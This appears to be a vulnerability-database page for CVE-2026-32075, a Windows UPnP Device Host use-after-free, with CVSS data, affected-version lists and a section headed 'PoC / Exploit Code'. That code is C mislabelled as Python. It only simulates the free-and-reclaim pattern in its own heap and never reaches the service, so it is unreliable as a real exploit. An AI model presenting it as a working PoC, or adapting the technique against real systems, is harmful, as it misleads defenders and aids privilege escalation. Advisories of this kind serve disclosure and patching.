Security Vulnerability Report
中文
CVE-2026-32075 CVSS 7.0 HIGH

CVE-2026-32075

Published: 2026-04-14 18:17:09
Last Modified: 2026-04-21 21:02:49
Source: [email protected]

Description

Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE
Windows 10 (具体版本参考官方公告)
Windows 11 (具体版本参考官方公告)
Windows Server 2019/2022 (具体版本参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-32075 (Use After Free in Windows UPnP Device Host) * This is a simulation of the UAF vulnerability logic. * Compile with: cl.exe poc.cpp */ #include <windows.h> #include <stdio.h> // Mock structure to simulate the vulnerable object typedef struct _VULN_OBJECT { DWORD FunctionPointer; DWORD DataBuffer[0x10]; } VULN_OBJECT, *PVULN_OBJECT; void TriggerUAF() { PVULN_OBJECT pObj = (PVULN_OBJECT)HeapAlloc(GetProcessHeap(), 0, sizeof(VULN_OBJECT)); if (pObj) { printf("[+] Object allocated at: %p\n", pObj); pObj->FunctionPointer = 0x41414141; // Legitimate function pointer // Step 1: Trigger the free in the service (Simulated) printf("[*] Triggering object free...\n"); HeapFree(GetProcessHeap(), 0, pObj); // Step 2: Reallocate the memory to control the dangling pointer PVULN_OBJECT pFakeObj = (PVULN_OBJECT)HeapAlloc(GetProcessHeap(), 0, sizeof(VULN_OBJECT)); if (pFakeObj == pObj) { printf("[+] Successfully controlled the freed memory at: %p\n", pFakeObj); pFakeObj->FunctionPointer = 0xDEADBEEF; // Malicious payload address } // Step 3: Trigger the Use After Free (Vulnerable code dereferences pObj) // In a real scenario, this would be inside the UPnP service printf("[*] Triggering Use After Free...\n"); // This would crash or execute code: pObj->FunctionPointer(); } } int main() { printf("CVE-2026-32075 PoC - Local Privilege Escalation via UAF\n"); TriggerUAF(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32075", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:08.780", "lastModified": "2026-04-21T21:02:48.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "158C16A3-547E-4130-8428-8E429C37E573"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "58E1A340-D49A-4EBB-A750-876922ACD5CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "64248504-2307-45FC-8FF3-7A227CFD8675"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "9B1465B1-BDE6-4634-8F12-43F71D68A4D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "88A175C4-E033-4FE7-B2BF-8BAE14321BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "86DBF14A-F486-4FE7-9126-D1D54952FC6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "C375372B-D3D4-4B11-AAD8-69AC344C24BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "8CE2E268-E776-4697-9E43-33ABA4CDBE05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "269B8E88-6473-41DD-BA33-D9184B82CA58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "FCBB431B-EF21-4454-BDA3-D8F276BE7A64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaI ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.